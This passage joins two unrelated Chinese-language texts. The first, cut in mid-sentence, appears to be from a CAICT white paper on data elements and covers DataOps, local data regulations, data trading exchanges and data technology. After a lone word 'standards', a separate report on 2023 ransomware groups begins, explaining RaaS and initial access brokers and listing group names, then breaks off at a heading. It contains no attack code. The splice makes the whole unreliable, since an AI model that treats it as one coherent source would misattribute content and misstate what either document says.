发与管理的协同;数据管理成果通过被业务分析人员、数据科学家等 角色自助使用,支撑业务运营,同时运营结果反向指导数据管理工作, 实现管理与运营的协同。中国信息通信研究院与多行业头部企业于 2022 年共同成立 DataOps 标准工作组,发布能力框架模型和实践指 南,致力于将敏捷、精益等理念融入数据开发过程,打破协作壁垒, 构建集开发、治理、运营于一体的自动化数据流水线。目前,国内已 有超百家机构开展 DataOps 相关实践,我国企业对于 DataOps 已从概 念启蒙引入阶段演进至规模化落地阶段,各行业高质量、高价值数据 的汇聚、融合与应用工作也得以大大加速。 来源: 中国信息通信研究院 图 5 DataOps:敏捷协同的一体化管理 在管理数据的同时,企业正在同步推进业务需求梳理与挖掘, 数据应用场景持续扩充。早期互联网、金融等数据密集型企业为提高 营销、风控等业务能力,通过对自身数据的挖掘和分析,洞察用户需 求、优化运营、提供个性化服务,从而提升自身竞争力和用户满意度。 例如,电子商务企业可以根据用户的购买历史和浏览行为,推荐符合 其兴趣和喜好的产品;普惠金融机构可以根据用户的资质、历史行为 等数据评价信用分数与风险等级,实现对个人、小微企业等主体的精 准放贷。随着数字经济的发展,数实融合成为产业发展与经济增长的 新动力。数字化水平较高的头部企业进一步挖掘业务链条中的数据需 求,通过自有数据的挖掘和分析,为生态伙伴提供更加科学化的决策 依据,以实现其生产、流通等环节的高效运作。例如,头部电商自营 品牌京东京造,利用其丰富的用户数据和数据赋能的强大供应链管理 能力,基于 “你做工厂,我做市场”的分工定位与品牌方深度合作, 2022 年总销售额同比增长 60%、100 个以上品类年均销售额增长超过 300%、新品开发成功率超过 90%、帮助工厂平均降低 30 天库存周转。 传统企业愈加重视数据要素的沉淀、挖掘和应用能力提升。随着 信息技术的持续发展和普及,传统企业也越来越重视数据与生产、调 度、调控、营销等业务的融合应用,以实现设备级、工厂级和企业级 的互联互通,从而提高生产效率、降低成本、改善产品质量和创新能 力。例如,在制造业中,工业互联网可以实现设备的远程监控和故障 诊断,提高生产线的稳定性和可靠性;可以通过数据分析和预测技术 进行生产计划和库存管理,实现定制化生产和个性化营销;可以通过 供应链的数字化和智能化,实现物流协同和合作,降低成本。 在夯实数据能力的基础上,企业积极挖掘并输出自身数据能力特 色,通过提供高质量数据服务创新数据要素市场参与方式。数据要素 供应链条长,在供给、流通、应用、安全等环节均有细分的市场需求。 对于专业数据能力突出的中小企业,可借助集聚优势,寻找市场定位, 塑造服务品牌。例如,人工智能的发展催生了数据标注、清洗等基础 数据服务需求。山西省大同市积极布局基础数据服务产业,并于 2022 年 11 月印发《大同市促进数据呼叫(标注)产业发展的若干政策》, 明确了坐席、场地等补贴标准。上海润迅、重庆人和、华顺金服等 20 多家基础数据服务企业先后落地大同,利用大同市人力资源、场 地、电力等成本优势,不断强化在数据要素市场中的竞争力。对于数 据资源富集、数据综合能力强的大型企业,除供给数据资源外,利用 数据能力提供综合性数据产品与解决方案也是启动数据要素市场的 有效手段。在数据要素市场发展的初级阶段,利用自身数据积累优势 和服务能力优势,深入调研数据需求方的核心业务痛点,提供针对性 的数据产品与解决方案,进而形成可复制推广的数据产品与能力架构, 可有效实现数据流通所带来的价值倍增。例如,国家电网向银行出售 电力大数据金融风控等服务,打造“ 电力数据看”新模式,拓展电力 数据应用场景。中国移动打造了生态开放、技术先进、数据全面、安 全可控的“梧桐”大数据品牌,通过梧桐大数据门户实现“产品订购 入口、生态合作入口、技术分享入口”的统一,全面对外输出中国移 动的数据产品与能力。招商银行整合发布“企业数智金融”品牌服务, 突出从产品视角向客户视角的转变,从客户的销售场景、采购场景和 员工服务中研究客户的需求和痛点,提供整体的数智化解决方案。 (二) 政府侧:建立公平高效的机制是关键 政府及其他党政机关作为国家治理的核心力量,在数据要素发展 过程中扮演着有序引导和规范发展的关键角色。除向社会供给高价值 公共数据外,提升治理能力,创新治理手段,建立公平高效的数据要 素发展促进机制,守护数据要素可持续发展环境是更好发挥政府在数 据要素领域作用的关键。 面对数据要素这一新兴事物,各地方在中央宏观战略指引下,加 紧制定数据条例与行动方案,更加灵活、主动地探索推进数据要素发 展的实施规范乃至细化的操作流程。自 2015 年实施国家大数据战略 以来,我国已有 22 个省级行政区、4 个副省级市出台数据相关条例 共 30 份(如图 6)。作为地方人民代表大会或其常务委员会通过的 法律文件,这些条例为地方数据要素的发展提供了法律基础。截至 2023 年 8 月,全国已有 27 个省(自治区、直辖市)设置了专门的省 级大数据管理机构。省级大数据专职管理机构的不断扩充,有效推动 数据资源整合和开发利用效率与效益提升。此外,部分地区发布发展 规划、行动方案等政策文件,将数据要素的产业集聚、流通交易、数 据驱动的经济高质量发展等作为重点,致力于营造公平高效的数据要 素发展环境。例如,上海市《张江数据要素产业集聚区建设三年行动 方案(2023-2025 年)》《立足数字经济新赛道推动数据要素产业创 新发展行动方案(2023-2025 年)》等文件谋划了上海数据要素发展 的体系性布局,在维护数据安全、强化数据安全产业的基础上,基于 要素融合和生态构建,着力打造高水平的数据要素产业集聚区。深圳 市发布的《深圳市数据交易管理暂行办法》《深圳市数据商和数据流 通交易第三方服务机构管理暂行办法》规范了数据交易范围和市场主 体行为,并成立数据交易监管机制专责小组,率先以制度的形式明确 建立跨部门协同监管的机制。先行地区的制度与机制体现了数据要素 领域有效市场和有为政府相结合的创新成果,对中央和其他地方引导 和推进数据要素发展均有重要的借鉴意义。 来源: 中国信息通信研究院 图 6 地方数据相关条例出台情况 加快完善数据领域央地协同和条块协同机制是当前的重要命题。 在地方纷纷成立大数据管理机构承担数据领域统筹协调与资源整合 共享职能的背景下,国家数据局的成立顺应了各界对国家层面组建专 职管理部门的期待。然而,国家数据局尚处于初建阶段,如何理顺国 家和省级数据管理机构关系、平衡国家各部委及地方各委办局间职能, 需要尽快探索方案并落地执行。一方面,各地大数据管理机构的单位 性质和隶属关系并不相同,主要可分为省政府直属机构、省政府办公 厅管理机构、省行业主管部门管理机构三类,且多有承担推进数字政 府建设、数据安全治理、大数据产业管理等当前国家数据局所规划职 责之外的工作。国家和省级机构履行职能过程中仍会存在 “一对多、 多对一”等多头管理问题。加快理顺管理关系,完善央地协同机制, 是推进构建数据要素可持续发展环境的必要前提。另一方面,国家和 地方数据管理机构与其他行业主管部门各有职责划分,既包括产业发 展、资产管理等业务领域的区分,又包括人社、交通等垂直行业的区 分。加快理顺国家各部委、地方各委办局间职能,完善条块协同机制, 促进数据要素跨部门、跨行业、跨地域互联互通与开发利用,是促进 数据要素公平高效发展的重要保障。 提升治理能力、营造兼顾效率与公平的数据要素发展环境仍应成 为政府工作重点。纵观各地数据要素相关政策制度,尽管产业格局、 发展目标、数据供给、流通、应用等重点发力方向等基本明确,但落 地抓手相对有限,还不能完全适应数据要素的新特性和新趋势。“数 据二十条”提出,要充分发挥政府有序引导和规范发展的作用,守住 安全底线,明确监管红线,打造安全可信、包容创新、公平开放、监 管有效的数据要素市场环境。守住数据安全底线、推进数据要素可持 续探索、促进数据价值释放应成为各地治理的共识。一方面,要提升 数据安全纵深防护与综合防御能力,健全数据要素市场监督管理体系, 在明确监管对象、范围、标准、程序等规则基础上,加强合规、违约、 欺诈等重点领域的执法司法,维护数据要素市场的公平环境。另一方 面,要适应数据要素新特性,不断创新治理手段,通过建立市场准入 第三方评估机制、负面清单动态调整机制、合同约定与争议仲裁机制 等,提高市场主体合作互信程度和自发探索的活跃程度,避免对市场 主体的不必要干预,为数据要素市场的高效实践留足空间。 四、市场:场内外结合推动数据资源最优配置 数据要素市场是实现数据要素价值第三次飞跃的关键。数据在市 场中流通使数据流向更需要的地方,让不同来源的优质数据在新的业 务需求和场景中汇聚融合,实现双赢、多赢的价值利用4。在此基础 上,不同的数据流通形态串联起各类主体,推动场内外数据要素市场 活跃探索,引导数据要素在供需关系与价格机制的作用下实现最优配 置,创造更大的经济效益。 (一) 数据流通存在多层次多样化形态 推进数据要素充分流通,首先应正确认识数据流通的表现形式, 从不同角度分析数据流通的类型,包含参与主体的供需关系、流通对 象的形态和交付方式等。 从流通主体间的供需关系来看,数据流通存在开放、共享、交易 三种供需模式,区别在于数据需求方获取数据所需要支付的对价关系 不同。数据开放是指数据提供方无偿提供数据,需求方无需支付对价 的数据单向流通形式。由于数据提供方无法通过数据开放直接获得收 益,因此数据开放的对象往往是公共数据。数据共享是指参与主体互 为数据供需方,不强调货币媒介参与的数据双向流通形式,但共享过 程往往涉及复杂的相互博弈,相较于一对一的两方共享,政府间或行 业间的多方数据共享更容易形成规模和持续开展。数据交易则是指数 据提供方有偿提供数据,需求方通过货币等形式支付对价的数据单向 流通形式。相较于数据开放和共享,数据交易更容易激发市场参与主 体积极性,成为数据要素市场化流通的主要形式。 此外,近两年来关于“数据运营”“数据信托”等新概念、新探 索的讨论十分火热。我们认为,站在供需双方流通闭环的角度,这些 4 《数据要素白皮书(2022 年)》 新模式并未改变双方的供需关系,不属于与开放、共享、交易并列的 全新流通模式,而是在供需对接过程中引入了新主体,由数据经纪商、 数据运营服务商和数据托管服务商等各类数商提供了中介性功能,在 促进数据资源供给、降低数据获取成本、消除供需方之间资源错配等 方面发挥了重要作用。 来源: 中国信息通信研究院 图 7 数据要素流通的多种形态 从流通对象来看,流通中的数据包括从原料到衍生服务的多种形 态(如图 7)。就产品形态而言,流通中的数据产品可以参照实体商 品的加工程度来进行区分。类比石油化工领域,原油、天然气等是一 经开采即可得到的原材料,在此基础上进行不同程度的炼化和加工得 到不同类型的下游消费产品,一类如汽油、煤油等成品油,是对原材 料进行炼化得到的轻加工产品;一类如乙烯、丙烯等基础化工材料是 炼化后经裂解得到的深加工产品;一类如塑料、合成纤维等精细化工 材料是对基础化工材料进一步加工合成得到的精加工产品。相应地, 在数据流通领域,原始数据、标准化数据集、数据模型或分析结果、 数据应用解决方案可大致对应不同加工程度得到的数据产品和服务。 就交付形式而言,为满足不同的应用需求和安全保护要求,数据 产品的流通也呈现多样化的交付形式。与实体商品不同,数据产品的 流通并非简单的转移交割。在原材料层级,原始数据主要通过介质传 递、开放下载等方式直接复制或转移,但是,出于对数据可控性和可 用性的考量,实践中以原始数据形态进行的数据流通极少。在轻加工 层级,标准化数据集主要通过介质传递、开放下载、接口调用、终端 平台、定制服务等方式交付,其中介质传递或开放下载多适用于内容 固定的静态数据集,接口调用或终端平台多适用于随时间或需求不断 更新的动态数据集,此时流通的数据仍主要存储在数据提供方,但使 用方可以按需使用数据。在深加工层级,数据模型或分析结果可以通 过接口调用、分析报告、画像等形态交付,数据提供方主要交付数据 加工分析的结果,基于隐私计算的数据核验、数据查询、联合建模等 也属于这一类。在精加工层级,数据应用解决方案主要通过终端平台 和定制服务的形式交付,针对不同应用方的个性化需求提供定制化的 数据产品。 综合以上分析可见,数据流通的对象往往不是标准化、同质化的, 数据流通的表现形式也不是简单的数据产品买卖或转移。事实上,数 据流通并非数据上升为生产要素后的新生事物。长期以来,已有大量 的数据流通活动深度融合在政府和企业日常运转中,只是并未被标记 为一种单独的业务形态。例如,征信公司从不同金融机构收集同一客 户的金融行为数据,汇聚整合后形成对客户信用情况的评判,出具征 信报告,虽然这被称为“征信服务”,但其背后是大量数据在不同主 体之间被传递和使用。同理,互联网广告、资讯服务和企业供应链管 理等营销、风控领域的业务运转均依赖于海量数据的流转、整合与应 用,也存在大量的数据流通活动。 (二) 场外交易活跃,场内交易多点突破 场外交易仍是数据交易主要形式。如前所述,数据流通交易并非 新生事物。早在 1803 年,一群伦敦裁缝互相交换不能偿清债务的客 户信息,成为征信机构益博睿(Experian)发展的基石。1841 年,邓 白氏集团(Dun & Bradstreet)率先将各种商业信息收集汇聚,构建信 用评定的数据指标体系,数据服务商的雏形初现。长期以来,大量机 构收集多方数据,创新业务模式,打造竞争优势,满足数据需求,场 外点对点数据交易始终活跃。例如,查询服务行业中,天眼查、企查 查等企业通过非人工方式从全国企业信用信息公示系统、中国裁判文 书网等公共数据开放平台以及国家知识产权局等部门的官方网站收 集、聚合公开数据,运用独有技术与算法,提供独具价值的企业信息 查询服务,以会员制的方式实现数据价值的转移。金融行业中,万得、 同花顺等企业研发金融终端,对接、采购各类交易所、券商、资讯公 司等方数据,汇聚研发形成标准、实时、全面的数据库,供市场各大 机构购买使用。综合查询服务、金融、征信、广告、人工智能等各行 业的场外数据交易情况,2022 年场外数据交易规模约为 1000 亿元, 是场内交易规模的 50 倍5。 部分行业外部数据采购需求强烈。部分企业期望通过内外部数据 5 数据来源:黄丽华, 2022 年全球数商大会 的相互融合获得更加精准的市场分析、用户画像等能力来解决业务开 展过程中的核心问题,金融机构、互联网平台、广告公司等企业的外 部数据采购规模呈稳定增长趋势。以金融机构为例,通过对招投标等 公开信息的整理,众多银行每年都会以招标形式采购大量外部数据, 涉及反洗钱名单数据、资信数据、司法数据、供应链数据、行业经济 数据等种类,用以全面提升本行的风控与营销能力。截至 2022 年, 金融行业的数据供应商可达 2200 多家,其中注册资本金在 1000 万元 以上的占 67%,公司成立时间不超过 10 年的接近半数6。 场内数据交易多元化探索不断取得突破。中国信息通信研究院根 据公开信息统计显示,2023 年 1 月至 8 月,国内新成立 5 家数据交 易机构。目前,全国已先后成立 53 家数据交易机构,其中活跃的数 据交易机构已上架数据产品超 12000 种。各数据交易机构从不同角度 发力,在拓展业务模式、强化权益保障等方面积极创新,提升数据进 场交易吸引力。2023 年 1 月,贵阳大数据交易所发起招募数据首席 地推官,集结银行、交通、医疗、时空数据、数据交付等多个行业和 领域的专家,破题数据供需信息差,并率先探索“数据专区”运营模 式,打造全国首个气象数据专区和电力数据专区,官网显示截至 2023 年 7 月,两专区交易额分别达到 3500 万元和 1 亿元。2023 年 2 月, 深圳数据交易所提出构建动态合规体系,引入“信用”工具,打造动 态信用评级,力图降低企业合规门槛,构建可信交易环境,实现数据 交易的包容审慎监管。2023 年 7 月,北京市发布数据要素市场建设 6 数据来源:上海数据交易所研究院,金融业数据流通交易市场研究报告 领域十二大落地创新成果,其中九项由北京国际大数据交易所主导完 成,包括跨境征信报告核验项目、数据登记业务互认互通、数据资产 抵押授信等,为数据跨境、数据服务业务互通、数据要素金融服务等 方面探索提供宝贵经验。 所商分离背景下,数商生态不断完善。在广泛意义上,“数据二 十条”所鼓励的数据商和第三方专业服务机构,均可纳入“数商”范 畴,其核心功能是为数据供需方提供各类数据服务与市场服务。各类 数商在地方政府、数据交易所支持下,积极主动寻找市场定位,推动 数商生态不断完善。上海数据交易所以打造数商生态为特色,围绕完 善交易制度、扩大产品供给、完善基础设施建设、提升交易活跃度四 项内容,初步构建数商生态体系。2023 年 6 月,上海数据交易所上 线“数商生态”服务平台,通过多元化途径协助数商开展业务,将服 务渗透到数据交易的各个环节,调动数商参与数据要素市场的积极性。 数据经纪人是数商生态中的重要角色,承担数据价值洞察、撮合、代 理、评估等职责。2023 年 7 月, 由数交数据经纪(深圳)有限公司 牵头发起,全国近五十家数据交易场所、科研院所、数据商以及数据 交易中介机构共同起草的《数据经纪从业人员评价规范》团体标准正 式发布,培育并规范更多专业的数据经纪从业人员。 (三) 多措并举破除数据流通障碍 面对流通规则不完善的问题,各地加快健全数据要素市场制度与 规则。当前,数据流通的激励和权益保护规则仍未健全,市场主体合 规顾虑仍然较大。为此,各地在“数据二十条”指导下,制定符合当 地实际的政策,推进制度与规则的探索。例如,2023 年 7 月,北京 印发《关于更好发挥数据要素作用进一步加快发展数字经济的实施意 见》,提出推进数据产权结构性分置、完善数据收益合理化分配等具 体举措,布局推进公共数据专区授权运营、推进数据技术产品和商业 模式创新等探索方向。未来,细化 “数据二十条”提出的 “谁投入、 谁贡献、谁受益”原则,建立维护数据资源资产权益、兼顾效率与公 平、突出激励导向的数据收益分配制度,完善数据要素市场准入制度 和市场竞争框架,建立尽职免责、容错免责机制等制度与规则仍为各 地政府探索的重点。 面对权利归属难界定的问题,各地推进数据产权登记新方式。数 据的来源广泛,涉及到的相关主体较为复杂,数据权属不明及错配始 终是数据交易操作中的“拦路虎”。 “数据二十条”提出研究数据产 权登记新方式。各地、各数据交易服务机构针对场内交易,积极探索 数据登记制度,通过对每一个进入流通的数据产品赋予唯一的产品编 码或标识,发放数据登记凭证,为流通市场提供权威信息,助力保障 数据产品流通的安全合规性。2023 年 5 月,浙江省知识产权局、北 京市知识产权局分别制定发布了数据知识产权登记相关管理办法。 2023 年 6 月,深圳发改委发布了《深圳市数据产权登记管理暂行办 法》,从登记主体、机构、行为与监督管理等角度,制定了覆盖数据 产权登记全流程的管理办法。未来,数据确权本身仍将存在大量争议, 构建以促进产业发展为导向的数据产权登记框架,推进权责明确、保 护严格、流转顺畅的数据产权登记体系建设需加快探索。 面对支持力度仍有限的问题,还需进一步鼓励数据流通创新探索。 数据要素市场作为一项新兴事物,有着独特的属性和规律,培育数据 要素市场既缺乏先前经验借鉴,又缺少国外经验参考。当前我国数据 要素市场培育仍具有“重安全、轻发展”的特点,对数据流通创新探 索的支持仍然有限。未来,需着力统筹发展和安全,加大对创新探索 的支持力度:积极开展数据特区、数据委托运营、行业数据市场、多 级数据市场等创新试点。加大财税综合支持,扶植具有创新技术应用 或商业模式的代表性企业,鼓励自由竞争的市场化流通交易。鼓励企 业加强数据产品研发力度,主动创新商业模式,主动创造应用场景, 主动寻找市场机遇。大力培育多样、专业的数据服务机构,主动对接 数据创新成果、分析数据应用需求、撮合数据流通。研究建立数据资 产价值评价指标体系,从行业、场景等方面切入,开展数据估值定价 试点。进一步探索数据要素金融服务体系,提高相关企业的融资效率。 五、技术:基于业务需求加速创新与体系重构 技术发展持续推动着产业进步,业务需求也对技术提出新的要求。 随着数据规模爆炸式增长、数据类型日渐丰富,传统大数据处理技术 面临着诸多挑战,以满足业务需求为导向的数据技术体系将会不断变 革创新。 (一) 数据技术随业务要求不断演进 数据技术(Data Technology)伴随业务要求发展,数据要素三次 价值释放不同需求也推动着数据技术不断演进。当前,第一代数据技 术(DT1.0)、第二代数据技术(DT2.0)体系已基本成熟,第三代数 据技术(DT3.0)逐渐兴起。 第一阶段(DT1.0 时代),数据技术支撑业务贯通。在此阶段, 数据主要来自于业务运转,在不同的业务系统中进行共享及流通,在 此阶段数据技术主要支撑数据的事务处理,以文件系统、数据库等技 术为代表。 第二阶段(DT2.0 时代),数据技术推动数智决策。数据经过挖 掘、清洗、筛选并嵌套入相应场景,实现业务的智慧化、智能化决策。 在此阶段数据技术以数据仓库、数据湖以及湖仓一体等技术为代表, 以支撑数据的分析、治理等工作。 第三阶段(DT3.0 时代),数据技术进入可信流通对外赋能阶段。 在这一时期,数据不仅在企业内部流转,也将会通过流通发挥更大价 值,实现多方共赢。数据技术将推动各行业从“有数可用”到“数尽 其用”,全场景智能、跨领域协同、数据流通跨域安全管控成为新阶 段的发展目标,推动数据要素价值不断向更多应用场景拓展。技术方 面以相对匿名化、隐私计算、区块链、全密态数据库以及防篡改数据 库等技术为代表,以支撑数据要素可信流通。 (二) 数据要素时代新技术不断涌现 数据要素在强调通过大数据处理投入生产的同时,进一步突出了 数据在交易流通过程中产生经济价值(如图 8)。可控、可计量、可 流通是数据要素对数据技术提出的新要求,新技术不断涌现为数据要 素价值释放保驾护航。 来源: 中国信息通信研究院 图 8 数据要素流通技术流程图 以云原生、软硬协同以及湖仓一体等技术为代表的数据处理技 术持续助力用户降本增效。云原生技术通过存储计算分离架构,实现 资源池化和极致弹性,具备高扩展性、高可用性、跨地域规模、低成 本等优势,可为用户提供真正具备秒级智能弹性扩容能力、随需而动。 软硬协同技术为软件技术带来了新的机遇,一些企业陆续发布 GPU 数据库、数据库一体机等产品,以满足业务规模不断扩张的需求。硬 件技术的发展一方面促进了数据处理技术性能提升,另一方面也推动 了数据处理技术与其他新兴技术的融合,使得技术体系的安全性和智 能性得到提升。在湖仓一体方面,数据仓库(Data Warehouse)和数 据湖(Data Lake)两项技术在不断演进过程中逐渐融合形成湖仓一体 (Data Lakehouse)技术架构。湖仓一体集数据湖的灵活性、可扩展 性优势以及数据仓库的数据结构和数据管理功能于一体,能够降低数 据冗余、减少存储成本,提升数据处理时效性。当前,湖仓一体技术 落地应用速度持续加快,应用领域主要集中在互联网、电信运营商以 及金融等国内数字化程度较高行业。由于数据要素具有规模经济性, 企业将趋向于持续积累数据,能够助力企业降本增效的技术将会进一 步受到关注。 以人工智能、隐私计算、区块链、及图技术等为代表的新兴技 术持续护航数据要素安全流通。AI 技术与数据处理技术相结合降低 技术使用门槛,2023 年 AIGC 技术的跨越式突破发展,不仅使大语 言模型进入公众视野,更扩展了数据基础设施与 AI 融合的发展空间。 以数据库为例,生成式 AI 在数据库结构设计、架构设计、数据分析 挖掘等方面可以不同程度简化人员操作,提高开发、运维、分析的效 率,降低用户使用门槛,更好助力数据流通。数据库与隐私计算相结 合落地的全密态数据库能够解决数据全生命周期的隐私保护问题,使 得无论在何种系统环境下,数据在传输、运算以及存储的各个环节始 终都处于密文状态。数据库与区块链技术相结合形成的防篡改数据库, 能够很好地保障云上数据可信运维。防篡改数据库可以内部构建可信 索引结构,确保数据库数据的整体完整性,与区块链相结合形成的解 决方案,能够形成链上链下链路数据安全可信,解决多方业务间数据 安全可信流通难题。隐私计算与区块链相结合实现数据密态流转。在 控制面以区块链为核心构建数据流通管控层;在数据面以隐私计算为 核心构建密态数联网。数据流转过程中以密态形式流通,保障其流转、 计算、融合直到销毁的全链路安全可控,同时将数据要素持有权和使 用权分离,实现数据可用不可见、使用可控可计量、以及使用权跨域 管控。图联邦技术能够打破数据孤岛,图联邦技术是为了解决数据孤 岛、隐私保护和数据安全问题提出的概念,在保护用户隐私和公司数 据的前提下,更好地发挥数据价值。未来,新兴技术将在应用过程中 不断融合以适应不同场景下的技术需求,向着更加高效、安全的方向 不断发展。 向量数据库、图分析技术、时空大数据平台以及时空数据库等技 术有效支持新兴业务场景下的数据要素价值释放。向量数据库能够支 撑 AI 技术赋能数据要素价值释放。一些非结构化数据需要通过机器 学习算法从中提取出以向量为表示形式的“特征”,向量数据库的兴 起便是为了解决对这些向量进行存储与计算的问题。图分析技术助力 洞察数据连接新价值。数据要素时代,数据规模将会不断增大,数据 量及数据自身丰富度不断增加,图分析技术能够有效分析数据之间的 关联性以及处理数据之间的复杂关系。时空大数据平台或时空数据库 能够实现海量时空数据管理、查询、统计与分析。在现实世界中有超 过 80%的数据都和地理位置(空间)相关,而所有数据均含有时间属 性。因此,实际业务场景中许多数据需要通过时空大数据平台或时空 数据库来处理。近年来,时空大数据平台以及时空数据库等技术的发 展有效应对北斗时空大数据服务、数字孪生、智慧城市等新兴数据应 用业务场景下对于时空数据处理的需求。数据在不同应用场景下得到 更好地应用是数据要素价值释放的重要体现,适应应用场景的数据处 理技术将在融合创新中满足各项需求。 来源: 中国信息通信研究院 图 9 数据要素重构技术体系 (三) 数据要素技术体系重构加速 数据要素时代,围绕数据的采集、存储、计算、管理、流通、安 全各个环节,技术体系不断革新(如图 9)。数据采集方面,传统数 据采集通常采用外部数据源购买、人工检索以及搜索引擎数据等手段。 未来,数据采集技术将向采集途径多样化、数据类型多样化以及数据 结构多样化等方向持续发展,尤其是物联网技术的发展将极大扩展数 据采集的范围。数据存储方面,数据存储技术将向更高性能、更低成 本方向升级,从以存算耦合为代表的传统存储架构向存算分离的新型 架构不断演进,从而提高资源共享性和伸缩性。数据计算方面,新型 计算平台持续涌现以满足不同类型数据处理需求,计算实时性、交互 性将会不断提升。数据管理方面,传统数据管理技术人工参与多、效 率低,随着 AI 技术的不断发展将会极大程度代替人工从而提升整体 效率、压缩成本和周期。数据流通方面,在传统的数据流通过程中, 由于明文数据拷贝成本很低,数据资源持有权很容易失控。未来,对 于数据流通过程中“数据可用不可见”“数据可控可计量”“可溯源 存证”等技术理念将不断落地。数据安全方面将由传统的防护边界安 全技术向保护全生命周期的内生安全技术逐步演进。在以上环节构成 的技术体系不断革新完善的基础上,数据要素基础设施、可信数据空 间等综合性技术框架将逐渐落地成型,成为系统解决数据共享流通瓶 颈问题、安全可信类问题和数据内容保护问题的必要技术底座,确保 数据要素在供给方、使用方、服务方、监管方等主体间的通力合作中 释放价值。 六、趋势与展望 我国数据要素发展处于活跃探索期,突破方向将逐渐显现。各地、 各部门、从多个角度积极布局数据要素发展,各市场主体积极寻找在 数据要素发展中的定位和角色,寻找新的业务增长点。尽管目前尚未 形成成熟的方法论和推广模式,探索的路径尚未形成体系,但随着探 索的深入,新视角、新方式不断涌现,新方向和新热点层出不穷。未 来一段时间,公共数据授权运营可能进入大规模落地探索阶段,授权 运营的制度、平台、标准等将不断完善,高价值公共数据的高质量供 给有望在数据要素市场中率先“突出重围”。各大企业有望结合自身 数据资源、数据能力等各方面优势,将各自功能有机联系,形成数据 要素生态体系,带动市场各参与主体有序运转,形成 “飞轮效应”。 个人数据相关权益保护仍将持续加强,同时基于个人权益保护的个人 数据开发利用技术、模式也将不断创新。此外,面对国际数据治理新 格局,北京、上海、深圳等地将依托自身跨境合作优势,进一步探索 数据跨境的落地实施方案。 数据要素仍是各国战略布局与发力的重要领域。世界主要经济体 虽然也未找到数据价值高效流动、充分释放的成熟路径,但也在积极 布局数据战略,加快数据制度建设,以平衡数据保护与利用。例如, 美国于 2023 年 3 月发布《促进数据共享与分析中的隐私保护国家战 略》,将从国家战略的高度支持以隐私计算为核心的保护隐私数据共 享和分析(Privacy-Preserving Data Sharing and Analytics, PPDSA)技 术体系发展,从而在确保用户隐私、秘密安全的前提下抓住数据发展 机会、充分激发数据潜力。2023 年 7 月,欧盟委员会通过了 “欧盟- 美国数据隐私框架”(EU-U.S. Data Privacy Framework)的充分性决 定,标志着欧盟与美国的数据跨境流动重启,全球数据治理格局、数 据资源配置体系面临新的变化。 面向未来,数据要素与时代相伴发展,不断衍生出新的问题等待 破解。生成式人工智能为数据流通带来了新的可能模式,以内容生成 代替数据本身、以模型部署代替数据流动是否可能颠覆现有数据流通 模式,需要持续跟踪。推广数据文化、倡导数据利他主义的潮流既是 促进数据管理、数据应用、数据流通的理念,又是对数据的经济、社 会、文化特性的全新阐释。从面对未知的风险角度看,数据伦理的讨 论也日益增加。数据伦理的本质是人的伦理,构建由个人及至家国的 秩序,关怀数字时代的“弱势群体”,持续推进科技向善也是数据要 素发展的应有之义。 “大鹏一日同风起,扶摇直上九万里”。历史经验表明,生产要 素的扩充代表着生产模式、经济社会运行模式乃至人的生存状态、文 化形态、价值追求的变革。从“结绳记事”到大模型,数据伴随社会 发展变迁,承载人类认知世界的努力与探索。当前,我国正从“数据 大国”向“数字中国”全速前进,数据要素与新兴技术交织融合,数 据价值与行业发展相互交错,数据引擎正在被注入巨大动能。面向未 来,我们相信,在落实数据基础制度和建设数字中国的新篇章中,数 据要素的价值将被更加充分的挖掘,我国数据要素的发展也将迎来新 的突破。
standards
2023年活跃勒索攻击组织盘点 1.概述 勒索软件(Ransomware)是一种极具破坏性的计算机恶意程序。近年来,它已成为全球组织机构主要的网络安全威胁之一,被威胁行为体作为牟取非法经济利益的犯罪工具。威胁行为体为增加受害方支付勒索赎金的概率和提升赎金金额,从仅恶意加密数据演变为采用“窃取文件+加密数据”双重勒索策略,更有甚者,在双重勒索的基础上增加DDoS攻击和骚扰与受害方有关的第三方等手段,演变为“多重勒索”。一旦遭受勒索软件攻击,组织机构的正常运营将受到严重影响,可能导致业务中断、数据被窃取和恶意加密。威胁行为体以数据恢复和曝光威胁受害方并勒索赎金。数据涵盖文档、邮件、数据库和源代码等多种格式文件;赎金可采用真实货币或虚拟货币(如比特币)。威胁行为体通常设定赎金支付期限,并随时间推移提高金额。有时即使支付赎金,被恶意加密的文件也无法得到完全恢复。 2023年中,勒索攻击事件屡屡发生,威胁行为体通过广撒网式的非定向模式和有针对性的定向模式开展勒索攻击,造成勒索攻击持续活跃的因素之一是勒索软件即服务(Ransomware as a Service,RaaS)商业模式的不断更新。RaaS是勒索攻击组织开发和运营的基础设施,包括定制的破坏性勒索软件、窃密组件、勒索话术和收费通道等。各种攻击组织和个人可以租用RaaS攻击基础设施,完成攻击后与RaaS组织针对赎金进行分赃。这一商业模式的兴起和成熟使勒索攻击的门槛降低,威胁行为体甚至无需勒索软件开发技能就能定向攻击目标。另一因素是初始访问经纪人(Initial Access Broker,IAB)助纣为虐,IAB通过售卖有效访问凭证给威胁行为体实现非法获利,而无需亲自进行攻击。威胁行为体利用获得的凭证,对特定目标进行有针对性的勒索攻击,建立初始访问后展开后续恶意活动,最终实现对目标的勒索行为。 部分勒索攻击组织将受害者信息发布在特定的信息源,如Tor网站或Telegram频道。自2019年以来,据不完全统计,曾发布过受害者信息的不同名称组织约115个。由于各组织资源整合、品牌重塑或被执法机构查封等原因,在2023年中,共有68个不同名称的组织曾发布过受害者信息,涉及约5500个来自不同国家或地区不同行业的组织机构。实际受害者数量可能更多,因为威胁行为体出于某些原因可能选择不公开或删除信息,例如协商谈判达成一致或受害者支付赎金。 2023年发布受害者信息的组织: 0mega 8base Abyss Akira Alphv/BlackCat Arvinclub AvosLocker BianLian Black Basta BlackByte BlackSuit Cactus CiphBit Cloak Clop CrossLock CryptNet Cuba Cyclops Daixin DarkPower DarkRace Donut Dragonforce Dunghill Leak Everest Hive Hunters INCransom Karakurt Knight La Piovra LockBit Lorenz LostTrust Malas MalekTeam Mallox Medusa MedusaLocker Meow MetaEncryptor MoneyMessage Monti NoEscape Nokoyawa Play QiLin RaGroup RagnarLocker RanStreet Rancoz RansomEXX RansomHouse Ransomedvc Raznatovic Rhysida Royal Siegedsec Snatch Stormous Threeam Toufan Trigona Unsafe Vendetta Vice Society WereWolves 目前,勒索攻击的主流威胁形式已经演变为RaaS+定向攻击收取高额赎金的运行模式。全球范围内,制造、医疗、建筑、能源、金融和公共管理等行业频繁成为勒索攻击的目标,给全球产业产值造成严重损失。 2.勒索攻击行为分类 2023年活跃的勒索攻击行为主要有以下三类: 加密文件 